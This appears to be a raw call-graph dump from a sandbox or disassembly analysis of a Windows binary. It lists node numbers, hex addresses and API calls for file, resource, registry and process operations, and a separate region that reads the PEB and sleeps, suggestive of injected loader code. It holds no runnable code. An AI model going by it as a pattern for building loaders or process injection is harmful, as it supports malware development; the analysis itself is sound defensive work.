98775 ba50f5 40 API calls 98772->98775 98778 c12a75 ISource 98772->98778 98773 c129c4 98773->98778 99152 bcd583 26 API calls 98773->99152 98776 c12a91 98775->98776 98777 ba50f5 40 API calls 98776->98777 98780 c12aa1 98777->98780 98778->98449 98779 c129ed 99153 bcd583 26 API calls 98779->99153 98781 ba50f5 40 API calls 98780->98781 98783 c12abc 98781->98783 98784 ba50f5 40 API calls 98783->98784 98785 c12acc 98784->98785 98786 ba50f5 40 API calls 98785->98786 98787 c12ae7 98786->98787 98788 ba50f5 40 API calls 98787->98788 98789 c12af7 98788->98789 98790 ba50f5 40 API calls 98789->98790 98791 c12b07 98790->98791 98792 ba50f5 40 API calls 98791->98792 98793 c12b17 98792->98793 99125 c13017 GetTempPathW GetTempFileNameW 98793->99125 98795 c12b22 98796 bce5eb 29 API calls 98795->98796 98807 c12b33 98796->98807 98797 c12bed 99135 bce678 98797->99135 98799 c12bf8 98801 c12c12 98799->98801 98802 c12bfe DeleteFileW 98799->98802 98800 ba50f5 40 API calls 98800->98807 98803 c12c91 CopyFileW 98801->98803 98809 c12c18 98801->98809 98802->98778 98804 c12ca7 DeleteFileW 98803->98804 98805 c12cb9 DeleteFileW 98803->98805 98804->98778 99148 c12fd8 CreateFileW 98805->99148 98807->98778 98807->98797 98807->98800 99126 bcdbb3 98807->99126 99155 c122ce 98809->99155 98812 c12c80 DeleteFileW 98812->98778 98814 bab578 98813->98814 98815 bab57f 98813->98815 98814->98815 99454 bc62d1 39 API calls _strftime 98814->99454 98815->98376 98817 bab5c2 98817->98376 98818->98410 98819->98423 98821 ba4f4a 98820->98821 98822 ba4f43 98820->98822 98824 ba4f6a FreeLibrary 98821->98824 98825 ba4f59 98821->98825 98823 bce678 67 API calls 98822->98823 98823->98821 98824->98825 98825->98450 98826->98614 98827->98614 98828->98610 98829->98615 98831 ba4ea8 GetProcAddress 98830->98831 98832 ba4ec6 98830->98832 98833 ba4eb8 98831->98833 98835 bce5eb 98832->98835 98833->98832 98834 ba4ebf FreeLibrary 98833->98834 98834->98832 98866 bce52a 98835->98866 98837 ba4eea 98837->98633 98837->98634 98839 ba4e6e 
GetProcAddress 98838->98839 98840 ba4e8d 98838->98840 98841 ba4e7e 98839->98841 98843 ba4f80 98840->98843 98841->98840 98842 ba4e86 FreeLibrary 98841->98842 98842->98840 98844 bbfe0b 22 API calls 98843->98844 98845 ba4f95 98844->98845 98846 ba5722 22 API calls 98845->98846 98847 ba4fa1 __fread_nolock 98846->98847 98848 be3d1d 98847->98848 98849 ba50a5 98847->98849 98859 ba4fdc 98847->98859 98931 c1304d 74 API calls 98848->98931 98920 ba42a2 CreateStreamOnHGlobal 98849->98920 98852 be3d22 98854 ba511f 64 API calls 98852->98854 98853 ba50f5 40 API calls 98853->98859 98855 be3d45 98854->98855 98856 ba50f5 40 API calls 98855->98856 98857 ba506e ISource 98856->98857 98857->98641 98859->98852 98859->98853 98859->98857 98926 ba511f 98859->98926 98861 ba5107 98860->98861 98862 be3d70 98860->98862 98953 bce8c4 98861->98953 98865 c128fe 27 API calls 98865->98649 98869 bce536 BuildCatchObjectHelperInternal 98866->98869 98867 bce544 98891 bcf2d9 20 API calls __dosmaperr 98867->98891 98869->98867 98870 bce574 98869->98870 98872 bce579 98870->98872 98873 bce586 98870->98873 98871 bce549 98892 bd27ec 26 API calls __wsopen_s 98871->98892 98893 bcf2d9 20 API calls __dosmaperr 98872->98893 98883 bd8061 98873->98883 98877 bce58f 98879 bce595 98877->98879 98880 bce5a2 98877->98880 98878 bce554 __wsopen_s 98878->98837 98894 bcf2d9 20 API calls __dosmaperr 98879->98894 98895 bce5d4 LeaveCriticalSection __fread_nolock 98880->98895 98884 bd806d BuildCatchObjectHelperInternal 98883->98884 98896 bd2f5e EnterCriticalSection 98884->98896 98886 bd807b 98897 bd80fb 98886->98897 98890 bd80ac __wsopen_s 98890->98877 98891->98871 98892->98878 98893->98878 98894->98878 98895->98878 98896->98886 98904 bd811e 98897->98904 98898 bd8177 98916 bd4c7d 20 API calls __dosmaperr 98898->98916 98900 bd8180 98902 bd29c8 _free 20 API calls 98900->98902 98903 bd8189 98902->98903 98905 bd8088 98903->98905 98917 bd3405 11 API calls 2 library calls 98903->98917 98904->98898 98904->98905 98914 bc918d 
EnterCriticalSection 98904->98914 98915 bc91a1 LeaveCriticalSection 98904->98915 98911 bd80b7 98905->98911 98908 bd81a8 98918 bc918d EnterCriticalSection 98908->98918 98910 bd81bb 98910->98905 98919 bd2fa6 LeaveCriticalSection 98911->98919 98913 bd80be 98913->98890 98914->98904 98915->98904 98916->98900 98917->98908 98918->98910 98919->98913 98921 ba42bc FindResourceExW 98920->98921 98925 ba42d9 98920->98925 98922 be35ba LoadResource 98921->98922 98921->98925 98923 be35cf SizeofResource 98922->98923 98922->98925 98924 be35e3 LockResource 98923->98924 98923->98925 98924->98925 98925->98859 98927 ba512e 98926->98927 98928 be3d90 98926->98928 98932 bcece3 98927->98932 98931->98852 98935 bceaaa 98932->98935 98934 ba513c 98934->98859 98936 bceab6 BuildCatchObjectHelperInternal 98935->98936 98937 bceac2 98936->98937 98939 bceae8 98936->98939 98948 bcf2d9 20 API calls __dosmaperr 98937->98948 98950 bc918d EnterCriticalSection 98939->98950 98940 bceac7 98949 bd27ec 26 API calls __wsopen_s 98940->98949 98943 bceaf4 98951 bcec0a 62 API calls 2 library calls 98943->98951 98945 bceb08 98952 bceb27 LeaveCriticalSection __fread_nolock 98945->98952 98947 bcead2 __wsopen_s 98947->98934 98948->98940 98949->98947 98950->98943 98951->98945 98952->98947 98956 bce8e1 98953->98956 98955 ba5118 98955->98865 98957 bce8ed BuildCatchObjectHelperInternal 98956->98957 98958 bce92d 98957->98958 98959 bce925 __wsopen_s 98957->98959 98961 bce900 ___scrt_fastfail 98957->98961 98969 bc918d EnterCriticalSection 98958->98969 98959->98955 98983 bcf2d9 20 API calls __dosmaperr 98961->98983 98962 bce937 98970 bce6f8 98962->98970 98965 bce91a 98984 bd27ec 26 API calls __wsopen_s 98965->98984 98969->98962 98971 bce727 98970->98971 98974 bce70a ___scrt_fastfail 98970->98974 98985 bce96c LeaveCriticalSection __fread_nolock 98971->98985 98972 bce717 99058 bcf2d9 20 API calls __dosmaperr 98972->99058 98974->98971 98974->98972 98976 bce76a __fread_nolock 98974->98976 98976->98971 98977 bce886 ___scrt_fastfail 
98976->98977 98986 bcd955 98976->98986 98993 bd8d45 98976->98993 99060 bccf78 26 API calls 4 library calls 98976->99060 99061 bcf2d9 20 API calls __dosmaperr 98977->99061 98981 bce71c 99059 bd27ec 26 API calls __wsopen_s 98981->99059 98983->98965 98984->98959 98985->98959 98987 bcd976 98986->98987 98988 bcd961 98986->98988 98987->98976 99062 bcf2d9 20 API calls __dosmaperr 98988->99062 98990 bcd966 99063 bd27ec 26 API calls __wsopen_s 98990->99063 98992 bcd971 98992->98976 98994 bd8d6f 98993->98994 98995 bd8d57 98993->98995 98996 bd90d9 98994->98996 99001 bd8db4 98994->99001 99073 bcf2c6 20 API calls __dosmaperr 98995->99073 99088 bcf2c6 20 API calls __dosmaperr 98996->99088 98998 bd8d5c 99074 bcf2d9 20 API calls __dosmaperr 98998->99074 99000 bd90de 99089 bcf2d9 20 API calls __dosmaperr 99000->99089 99004 bd8dbf 99001->99004 99007 bd8d64 99001->99007 99011 bd8def 99001->99011 99075 bcf2c6 20 API calls __dosmaperr 99004->99075 99005 bd8dcc 99090 bd27ec 26 API calls __wsopen_s 99005->99090 99007->98976 99008 bd8dc4 99076 bcf2d9 20 API calls __dosmaperr 99008->99076 99012 bd8e08 99011->99012 99013 bd8e2e 99011->99013 99014 bd8e4a 99011->99014 99012->99013 99020 bd8e15 99012->99020 99077 bcf2c6 20 API calls __dosmaperr 99013->99077 99017 bd3820 __fread_nolock 21 API calls 99014->99017 99016 bd8e33 99078 bcf2d9 20 API calls __dosmaperr 99016->99078 99021 bd8e61 99017->99021 99064 bdf89b 99020->99064 99024 bd29c8 _free 20 API calls 99021->99024 99022 bd8e3a 99079 bd27ec 26 API calls __wsopen_s 99022->99079 99023 bd8fb3 99026 bd9029 99023->99026 99030 bd8fcc GetConsoleMode 99023->99030 99027 bd8e6a 99024->99027 99029 bd902d ReadFile 99026->99029 99028 bd29c8 _free 20 API calls 99027->99028 99031 bd8e71 99028->99031 99032 bd9047 99029->99032 99033 bd90a1 GetLastError 99029->99033 99030->99026 99034 bd8fdd 99030->99034 99035 bd8e7b 99031->99035 99036 bd8e96 99031->99036 99032->99033 99039 bd901e 99032->99039 99037 bd90ae 99033->99037 99038 bd9005 99033->99038 99034->99029 
99040 bd8fe3 ReadConsoleW 99034->99040 99080 bcf2d9 20 API calls __dosmaperr 99035->99080 99082 bd9424 28 API calls __fread_nolock 99036->99082 99086 bcf2d9 20 API calls __dosmaperr 99037->99086 99056 bd8e45 __fread_nolock 99038->99056 99083 bcf2a3 20 API calls __dosmaperr 99038->99083 99051 bd906c 99039->99051 99052 bd9083 99039->99052 99039->99056 99040->99039 99045 bd8fff GetLastError 99040->99045 99041 bd29c8 _free 20 API calls 99041->99007 99045->99038 99046 bd8e80 99081 bcf2c6 20 API calls __dosmaperr 99046->99081 99047 bd90b3 99087 bcf2c6 20 API calls __dosmaperr 99047->99087 99084 bd8a61 31 API calls 2 library calls 99051->99084 99054 bd909a 99052->99054 99052->99056 99085 bd88a1 29 API calls __fread_nolock 99054->99085 99056->99041 99057 bd909f 99057->99056 99058->98981 99059->98971 99060->98976 99061->98981 99062->98990 99063->98992 99065 bdf8a8 99064->99065 99066 bdf8b5 99064->99066 99091 bcf2d9 20 API calls __dosmaperr 99065->99091 99069 bdf8c1 99066->99069 99092 bcf2d9 20 API calls __dosmaperr 99066->99092 99068 bdf8ad 99068->99023 99069->99023 99071 bdf8e2 99093 bd27ec 26 API calls __wsopen_s 99071->99093 99073->98998 99074->99007 99075->99008 99076->99005 99077->99016 99078->99022 99079->99056 99080->99046 99081->99056 99082->99020 99083->99056 99084->99056 99085->99057 99086->99047 99087->99056 99088->99000 99089->99005 99090->99007 99091->99068 99092->99071 99093->99068 99095 ba6d91 99094->99095 99096 ba6d34 99094->99096 99098 ba93b2 22 API calls 99095->99098 99096->99095 99097 ba6d3f 99096->99097 99100 ba6d5a 99097->99100 99101 be4c9d 99097->99101 99099 ba6d62 __fread_nolock 99098->99099 99099->98674 99108 ba6f34 22 API calls 99100->99108 99103 bbfddb 22 API calls 99101->99103 99104 be4ca7 99103->99104 99105 bbfe0b 22 API calls 99104->99105 99106 be4cda 99105->99106 99107->98689 99108->99099 99110 ba63b6 __fread_nolock 99109->99110 99111 ba6382 99109->99111 99110->98700 99111->99110 99112 be4a82 99111->99112 99113 ba63a9 99111->99113 99115 bbfddb 
22 API calls 99112->99115 99114 baa587 22 API calls 99113->99114 99114->99110 99116 be4a91 99115->99116 99117 bbfe0b 22 API calls 99116->99117 99118 be4ac5 __fread_nolock 99117->99118 99119->98701 99120->98743 99121->98745 99184 bce4e8 99122->99184 99124 c1275d 99124->98765 99125->98795 99127 bcdbc1 99126->99127 99133 bcdbdd 99126->99133 99128 bcdbcd 99127->99128 99129 bcdbe3 99127->99129 99127->99133 99201 bcf2d9 20 API calls __dosmaperr 99128->99201 99198 bcd9cc 99129->99198 99132 bcdbd2 99202 bd27ec 26 API calls __wsopen_s 99132->99202 99133->98807 99136 bce684 BuildCatchObjectHelperInternal 99135->99136 99137 bce6aa 99136->99137 99138 bce695 99136->99138 99147 bce6a5 __wsopen_s 99137->99147 99336 bc918d EnterCriticalSection 99137->99336 99353 bcf2d9 20 API calls __dosmaperr 99138->99353 99141 bce69a 99354 bd27ec 26 API calls __wsopen_s 99141->99354 99142 bce6c6 99337 bce602 99142->99337 99145 bce6d1 99355 bce6ee LeaveCriticalSection __fread_nolock 99145->99355 99147->98799 99149 c13013 99148->99149 99150 c12fff SetFileTime CloseHandle 99148->99150 99149->98778 99150->99149 99151->98773 99152->98779 99153->98772 99154->98772 99156 c122d9 99155->99156 99157 c122e7 99155->99157 99158 bce5eb 29 API calls 99156->99158 99159 c1232c 99157->99159 99160 bce5eb 29 API calls 99157->99160 99176 c122f0 99157->99176 99158->99157 99429 c12557 99159->99429 99161 c12311 99160->99161 99161->99159 99163 c1231a 99161->99163 99167 bce678 67 API calls 99163->99167 99163->99176 99164 c12370 99165 c12395 99164->99165 99166 c12374 99164->99166 99433 c12171 99165->99433 99169 c12381 99166->99169 99171 bce678 67 API calls 99166->99171 99167->99176 99172 bce678 67 API calls 99169->99172 99169->99176 99171->99169 99172->99176 99176->98805 99176->98812 99187 bce469 99184->99187 99186 bce505 99186->99124 99188 bce48c 99187->99188 99189 bce478 99187->99189 99194 bce488 __alldvrm 99188->99194 99197 bd333f 11 API calls 2 library calls 99188->99197 99195 bcf2d9 20 API calls __dosmaperr 
99189->99195 99191 bce47d 99196 bd27ec 26 API calls __wsopen_s 99191->99196 99194->99186 99195->99191 99196->99194 99197->99194 99203 bcd97b 99198->99203 99201->99132 99202->99133 99204 bcd987 BuildCatchObjectHelperInternal 99203->99204 99211 bc918d EnterCriticalSection 99204->99211 99206 bcd995 99212 bcd9f4 99206->99212 99211->99206 99220 bd49a1 99212->99220 99218 bcd9a2 99221 bcd955 __fread_nolock 26 API calls 99220->99221 99222 bd49b0 99221->99222 99223 bdf89b __fread_nolock 26 API calls 99222->99223 99224 bd49b6 99223->99224 99225 bcda09 99224->99225 99226 bd3820 __fread_nolock 21 API calls 99224->99226 99229 bcda3a 99225->99229 99227 bd4a15 99226->99227 99228 bd29c8 _free 20 API calls 99227->99228 99228->99225 99232 bcda4c 99229->99232 99235 bcda24 99229->99235 99230 bcda5a 99266 bcf2d9 20 API calls __dosmaperr 99230->99266 99232->99230 99232->99235 99239 bcda85 __fread_nolock 99232->99239 99240 bd4a56 62 API calls 99235->99240 99237 bcd955 __fread_nolock 26 API calls 99237->99239 99239->99235 99239->99237 99241 bd59be 99239->99241 99268 bcdc0b 99239->99268 99240->99218 99336->99142 99338 bce60f 99337->99338 99339 bce624 99337->99339 99375 bcf2d9 20 API calls __dosmaperr 99338->99375 99342 bcdc0b 62 API calls 99339->99342 99345 bce61f 99339->99345 99341 bce614 99376 bd27ec 26 API calls __wsopen_s 99341->99376 99344 bce638 99342->99344 99356 bd4d7a 99344->99356 99345->99145 99348 bcd955 __fread_nolock 26 API calls 99349 bce646 99348->99349 99360 bd862f 99349->99360 99353->99141 99354->99147 99355->99147 99357 bce640 99356->99357 99358 bd4d90 99356->99358 99357->99348 99358->99357 99359 bd29c8 _free 20 API calls 99358->99359 99359->99357 99361 bd863e 99360->99361 99362 bd8653 99360->99362 99380 bcf2c6 20 API calls __dosmaperr 99361->99380 99364 bd868e 99362->99364 99368 bd867a 99362->99368 99382 bcf2c6 20 API calls __dosmaperr 99364->99382 99365 bd8643 99381 bcf2d9 20 API calls __dosmaperr 99365->99381 99377 bd8607 99368->99377 99369 bd8693 99375->99341 
99376->99345 99385 bd8585 99377->99385 99380->99365 99382->99369 99430 c1257c 99429->99430 99432 c12565 __fread_nolock 99429->99432 99431 bce8c4 __fread_nolock 40 API calls 99430->99431 99431->99432 99432->99164 99434 bcea0c ___std_exception_copy 21 API calls 99433->99434 99435 c1217f 99434->99435 99436 bcea0c ___std_exception_copy 21 API calls 99435->99436 99454->98817 99456 ba7510 53 API calls 99455->99456 99457 c27f90 99456->99457 99482 c27fd5 ISource 99457->99482 99493 c28cd3 99457->99493 99459 c28281 99460 c2844f 99459->99460 99465 c2828f 99459->99465 99534 c28ee4 60 API calls 99460->99534 99463 c2845e 99463->99465 99466 c2846a 99463->99466 99464 ba7510 53 API calls 99480 c28049 99464->99480 99506 c27e86 99465->99506 99466->99482 99471 c282c8 99521 bbfc70 99471->99521 99474 c28302 99528 ba63eb 22 API calls 99474->99528 99475 c282e8 99527 c1359c 82 API calls __wsopen_s 99475->99527 99478 c282f3 GetCurrentProcess TerminateProcess 99478->99474 99479 c28311 99529 ba6a50 22 API calls 99479->99529 99480->99459 99480->99464 99480->99482 99525 c0417d 22 API calls __fread_nolock 99480->99525 99526 c2851d 42 API calls _strftime 99480->99526 99482->98453 99483 c2832a 99491 c28352 99483->99491 99530 bb04f0 22 API calls 99483->99530 99484 c284c5 99484->99482 99489 c284d9 FreeLibrary 99484->99489 99486 c28341 99531 c28b7b 75 API calls 99486->99531 99489->99482 99491->99484 99532 bb04f0 22 API calls 99491->99532 99533 baaceb 23 API calls ISource 99491->99533 99535 c28b7b 75 API calls 99491->99535 99494 baaec9 22 API calls 99493->99494 99495 c28cee CharLowerBuffW 99494->99495 99536 c08e54 99495->99536 99499 baa961 22 API calls 99500 c28d2a 99499->99500 99501 ba6d25 22 API calls 99500->99501 99502 c28d3e 99501->99502 99503 ba93b2 22 API calls 99502->99503 99505 c28d48 _wcslen 99503->99505 99504 c28e5e _wcslen 99504->99480 99505->99504 99543 c2851d 42 API calls _strftime 99505->99543 99507 c27ea1 99506->99507 99511 c27eec 99506->99511 99508 bbfe0b 22 API calls 99507->99508 
99509 c27ec3 99508->99509 99510 bbfddb 22 API calls 99509->99510 99509->99511 99510->99509 99512 c29096 99511->99512 99513 c292ab ISource 99512->99513 99520 c290ba _strcat _wcslen 99512->99520 99513->99471 99514 bab567 39 API calls 99514->99520 99515 bab38f 39 API calls 99515->99520 99516 bab6b5 39 API calls 99516->99520 99517 ba7510 53 API calls 99517->99520 99518 bcea0c 21 API calls ___std_exception_copy 99518->99520 99520->99513 99520->99514 99520->99515 99520->99516 99520->99517 99520->99518 99546 c0efae 24 API calls _wcslen 99520->99546 99522 bbfc85 99521->99522 99523 bbfd1d VirtualAlloc 99522->99523 99524 bbfceb 99522->99524 99523->99524 99524->99474 99524->99475 99525->99480 99526->99480 99527->99478 99528->99479 99529->99483 99530->99486 99531->99491 99532->99491 99533->99491 99534->99463 99535->99491 99538 c08e74 _wcslen 99536->99538 99537 c08f63 99537->99499 99537->99505 99538->99537 99539 c08ea9 99538->99539 99541 c08f68 99538->99541 99539->99537 99544 bbce60 41 API calls 99539->99544 99541->99537 99545 bbce60 41 API calls 99541->99545 99543->99504 99544->99539 99545->99541 99546->99520 99548 ba9c7e 99547->99548 99549 bef545 99547->99549 99554 bbfddb 22 API calls 99548->99554 99550 bef556 99549->99550 99552 ba6b57 22 API calls 99549->99552 99551 baa6c3 22 API calls 99550->99551 99553 bef560 99551->99553 99552->99550 99553->99553 99555 ba9c91 99554->99555 99556 ba9c9a 99555->99556 99557 ba9cac 99555->99557 99558 ba9cb3 22 API calls 99556->99558 99559 baa961 22 API calls 99557->99559 99560 ba9ca2 99558->99560 99559->99560 99560->98457 99560->98461 99620 ba54c6 99561->99620 99564 ba54c6 3 API calls 99565 bbfa9a 99564->99565 99565->98478 99567 bbfe0b 22 API calls 99566->99567 99568 ba6295 99567->99568 99569 bbfddb 22 API calls 99568->99569 99570 ba62a3 99569->99570 99571 bbf141 99570->99571 99572 bbf188 99571->99572 99573 bbf14c 99571->99573 99574 baa6c3 22 API calls 99572->99574 99573->99572 99575 bbf15b 99573->99575 99581 c0caeb 99574->99581 99576 bbf170 
99575->99576 99578 bbf17d 99575->99578 99626 bbf18e 99576->99626 99633 c0cbf2 26 API calls 99578->99633 99579 c0cb1a 99579->98493 99581->99579 99634 c0ca89 ReadFile SetFilePointerEx 99581->99634 99635 ba49bd 22 API calls __fread_nolock 99581->99635 99582 bbf179 99582->98493 99586 ba625f 99585->99586 99587 ba6250 99585->99587 99586->99587 99588 ba6264 CloseHandle 99586->99588 99587->98467 99588->99587 99590 ba575c CreateFileW 99589->99590 99591 be4035 99589->99591 99593 ba577b 99590->99593 99592 be403b CreateFileW 99591->99592 99591->99593 99592->99593 99594 be4063 99592->99594 99593->98488 99593->98492 99595 ba54c6 3 API calls 99594->99595 99596 be406e 99595->99596 99596->99593 99598 ba53f3 99597->99598 99611 ba53f0 ISource 99597->99611 99599 ba54c6 3 API calls 99598->99599 99598->99611 99600 ba5410 99599->99600 99601 be3f4b 99600->99601 99602 ba541d 99600->99602 99603 bbfa5b 3 API calls 99601->99603 99604 bbfe0b 22 API calls 99602->99604 99603->99611 99605 ba5429 99604->99605 99606 ba5722 22 API calls 99605->99606 99607 ba5433 99606->99607 99608 ba9a40 2 API calls 99607->99608 99609 ba543f 99608->99609 99610 ba54c6 3 API calls 99609->99610 99610->99611 99611->98498 99612->98504 99613->98502 99614->98505 99615->98509 99616->98461 99617->98461 99618->98495 99619->98499 99625 ba54dd 99620->99625 99621 be3f9c SetFilePointerEx 99622 ba5564 SetFilePointerEx SetFilePointerEx 99623 ba5530 99622->99623 99623->99564 99624 be3f8b 99624->99621 99625->99621 99625->99622 99625->99623 99625->99624 99636 bbf1d8 99626->99636 99632 bbf1c1 99632->99582 99633->99582 99634->99581 99635->99581 99637 bbfe0b 22 API calls 99636->99637 99638 bbf1ef 99637->99638 99639 bbfddb 22 API calls 99638->99639 99640 bbf1a6 99639->99640 99641 ba97b6 99640->99641 99655 ba9a1e 99641->99655 99644 ba97c7 99646 ba97fc 99644->99646 99662 ba9a40 99644->99662 99668 ba9b01 22 API calls __fread_nolock 99644->99668 99646->99632 99647 ba6e14 MultiByteToWideChar 99646->99647 99648 ba6e40 99647->99648 99649 ba6e87 
99647->99649 99650 bbfe0b 22 API calls 99648->99650 99651 baa6c3 22 API calls 99649->99651 99652 ba6e55 MultiByteToWideChar 99650->99652 99654 ba6e7b 99651->99654 99670 ba6e90 99652->99670 99654->99632 99656 ba9a2f 99655->99656 99657 bef378 99655->99657 99656->99644 99658 bbfddb 22 API calls 99657->99658 99659 bef382 99658->99659 99660 bbfe0b 22 API calls 99659->99660 99661 bef397 99660->99661 99663 ba9abb 99662->99663 99667 ba9a4e 99662->99667 99669 bbe40f SetFilePointerEx 99663->99669 99665 ba9a7c 99665->99644 99666 ba9a8c ReadFile 99666->99665 99666->99667 99667->99665 99667->99666 99668->99644 99669->99667 99671 ba6ea3 99670->99671 99672 ba6f24 99670->99672 99671->99672 99674 ba6eaf 99671->99674 99673 ba93b2 22 API calls 99672->99673 99680 ba6ec1 __fread_nolock 99673->99680 99675 ba6eb9 99674->99675 99676 ba6ee7 99674->99676 99682 ba6f34 22 API calls 99675->99682 99677 bbfddb 22 API calls 99676->99677 99679 ba6ef1 99677->99679 99681 bbfe0b 22 API calls 99679->99681 99680->99654 99681->99680 99682->99680 99683->98555 99684->98559 99685->98558 99686->98566 99687->98566 99689 ba6270 22 API calls 99688->99689 99715 ba9eb5 99689->99715 99690 ba9fd2 99717 baa4a1 22 API calls __fread_nolock 99690->99717 99692 ba9fec 99692->98572 99695 baa6c3 22 API calls 99695->99715 99696 bef7c4 99722 c096e2 84 API calls __wsopen_s 99696->99722 99697 bef699 99702 bbfddb 22 API calls 99697->99702 99698 baa405 99698->99692 99724 c096e2 84 API calls __wsopen_s 99698->99724 99704 bef754 99702->99704 99703 bef7d2 99723 baa4a1 22 API calls __fread_nolock 99703->99723 99707 bbfe0b 22 API calls 99704->99707 99706 bef7e8 99706->99692 99709 baa12c __fread_nolock 99707->99709 99709->99696 99709->99698 99710 baa587 22 API calls 99710->99715 99711 baa4a1 22 API calls 99711->99715 99712 baaec9 22 API calls 99713 baa0db CharUpperBuffW 99712->99713 99718 baa673 22 API calls 99713->99718 99715->99690 99715->99695 99715->99696 99715->99697 99715->99698 99715->99709 99715->99710 99715->99711 
99715->99712 99716 ba4573 41 API calls _wcslen 99715->99716 99719 ba48c8 23 API calls 99715->99719 99720 ba49bd 22 API calls __fread_nolock 99715->99720 99721 baa673 22 API calls 99715->99721 99716->99715 99717->99692 99718->99715 99719->99715 99720->99715 99721->99715 99722->99703 99723->99706 99724->99692 99726 c0dbdc GetFileAttributesW 99725->99726 99728 c0d4d5 99725->99728 99727 c0dbe8 FindFirstFileW 99726->99727 99726->99728 99727->99728 99729 c0dbf9 FindClose 99727->99729 99728->98314 99729->99728 99730 bd90fa 99731 bd9107 99730->99731 99735 bd911f 99730->99735 99780 bcf2d9 20 API calls __dosmaperr 99731->99780 99733 bd910c 99781 bd27ec 26 API calls __wsopen_s 99733->99781 99736 bd917a 99735->99736 99744 bd9117 99735->99744 99782 bdfdc4 21 API calls 2 library calls 99735->99782 99737 bcd955 __fread_nolock 26 API calls 99736->99737 99739 bd9192 99737->99739 99750 bd8c32 99739->99750 99741 bd9199 99742 bcd955 __fread_nolock 26 API calls 99741->99742 99741->99744 99743 bd91c5 99742->99743 99743->99744 99745 bcd955 __fread_nolock 26 API calls 99743->99745 99746 bd91d3 99745->99746 99746->99744 99747 bcd955 __fread_nolock 26 API calls 99746->99747 99748 bd91e3 99747->99748 99749 bcd955 __fread_nolock 26 API calls 99748->99749 99749->99744 99751 bd8c3e BuildCatchObjectHelperInternal 99750->99751 99752 bd8c5e 99751->99752 99753 bd8c46 99751->99753 99754 bd8d24 99752->99754 99758 bd8c97 99752->99758 99784 bcf2c6 20 API calls __dosmaperr 99753->99784 99791 bcf2c6 20 API calls __dosmaperr 99754->99791 99757 bd8c4b 99785 bcf2d9 20 API calls __dosmaperr 99757->99785 99761 bd8cbb 99758->99761 99762 bd8ca6 99758->99762 99759 bd8d29 99792 bcf2d9 20 API calls __dosmaperr 99759->99792 99783 bd5147 EnterCriticalSection 99761->99783 99786 bcf2c6 20 API calls __dosmaperr 99762->99786 99766 bd8cb3 99793 bd27ec 26 API calls __wsopen_s 99766->99793 99767 bd8cab 99787 bcf2d9 20 API calls __dosmaperr 99767->99787 99768 bd8cc1 99771 bd8cdd 99768->99771 99772 bd8cf2 99768->99772 99769 
bd8c53 __wsopen_s 99769->99741 99788 bcf2d9 20 API calls __dosmaperr 99771->99788 99774 bd8d45 __fread_nolock 38 API calls 99772->99774 99776 bd8ced 99774->99776 99790 bd8d1c LeaveCriticalSection __wsopen_s 99776->99790 99777 bd8ce2 99789 bcf2c6 20 API calls __dosmaperr 99777->99789 99780->99733 99781->99744 99782->99736 99783->99768 99784->99757 99785->99769 99786->99767 99787->99766 99788->99777 99789->99776 99790->99769 99791->99759 99792->99766 99793->99769 99794 15723b0 99808 1570000 99794->99808 99796 1572476 99811 15722a0 99796->99811 99814 15734a0 GetPEB 99808->99814 99810 157068b 99810->99796 99812 15722a9 Sleep 99811->99812 99813 15722b7 99812->99813 99815 15734ca 99814->99815 99815->99810 99816 bc03fb 99817 bc0407 BuildCatchObjectHelperInternal 99816->99817 99845 bbfeb1 99817->99845 99819 bc040e 99820 bc0561 99819->99820 99823 bc0438 99819->99823 99872 bc083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 99820->99872 99822 bc0568 99873 bc4e52 28 API calls _abort 99822->99873 99832 bc0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 99823->99832 99856 bd247d 99823->99856 99825 bc056e 99874 bc4e04 28 API calls _abort 99825->99874 99829 bc0576 99830 bc0457 99835 bc04d8 99832->99835 99868 bc4e1a 38 API calls 3 library calls 99832->99868 99864 bc0959 99835->99864 99836 bc04de 99837 bc04f3 99836->99837 99869 bc0992 GetModuleHandleW 99837->99869 99839 bc04fa 99839->99822 99840 bc04fe 99839->99840 99841 bc0507 99840->99841 99870 bc4df5 28 API calls _abort 99840->99870 99871 bc0040 13 API calls 2 library calls 99841->99871 99844 bc050f 99844->99830 99846 bbfeba 99845->99846 99875 bc0698 IsProcessorFeaturePresent 99846->99875 99848 bbfec6 99876 bc2c94 10 API calls 3 library calls 99848->99876 99850 bbfecb 99851 bbfecf 99850->99851 99877 bd2317 99850->99877 99851->99819 99854 bbfee6 99854->99819 99859 bd2494 99856->99859 99857 bc0a8c _ValidateLocalCookies 5 API calls 99858 
bc0451 99857->99858 99858->99830 99860 bd2421 99858->99860 99859->99857 99862 bd2450 99860->99862 99861 bc0a8c _ValidateLocalCookies 5 API calls 99863 bd2479 99861->99863 99862->99861 99863->99832 99893 bc2340 99864->99893 99867 bc097f 99867->99836 99868->99835 99869->99839 99870->99841 99871->99844 99872->99822 99873->99825 99874->99829 99875->99848 99876->99850 99881 bdd1f6 99877->99881 99880 bc2cbd 8 API calls 3 library calls 99880->99851 99884 bdd20f 99881->99884 99883 bbfed8 99883->99854 99883->99880 99885 bc0a8c 99884->99885 99886 bc0a95 99885->99886 99887 bc0a97 IsProcessorFeaturePresent 99885->99887 99886->99883 99889 bc0c5d 99887->99889 99892 bc0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 99889->99892 99891 bc0d40 99891->99883 99892->99891 99894 bc096c GetStartupInfoW 99893->99894 99894->99867 99895 ba1033 99900 ba4c91 99895->99900 99899 ba1042 99901 baa961 22 API calls 99900->99901 99902 ba4cff 99901->99902 99908 ba3af0 99902->99908 99904 ba4d9c 99906 ba1038 99904->99906 99911 ba51f7 22 API calls __fread_nolock 99904->99911 99907 bc00a3 29 API calls __onexit 99906->99907 99907->99899 99912 ba3b1c 99908->99912 99911->99904 99913 ba3b0f 99912->99913 99914 ba3b29 99912->99914 99913->99904 99914->99913 99915 ba3b30 RegOpenKeyExW 99914->99915 99915->99913 99916 ba3b4a RegQueryValueExW 99915->99916 99917 ba3b80 RegCloseKey 99916->99917 99918 ba3b6b 99916->99918 99917->99913 99918->99917 99919 bafe73 99926 bbceb1 99919->99926 99921 bafe89 99935 bbcf92 99921->99935 99923 bafeb3 99947 c1359c 82 API calls __wsopen_s 99923->99947 99925 bf4ab8 99927 bbcebf 99926->99927 99928 bbced2 99926->99928 99948 baaceb 23 API calls ISource 99927->99948 99930 bbced7 99928->99930 99931 bbcf05 99928->99931 99932 bbfddb 22 API calls 99930->99932 99949 baaceb 23 API calls ISource 99931->99949 99934 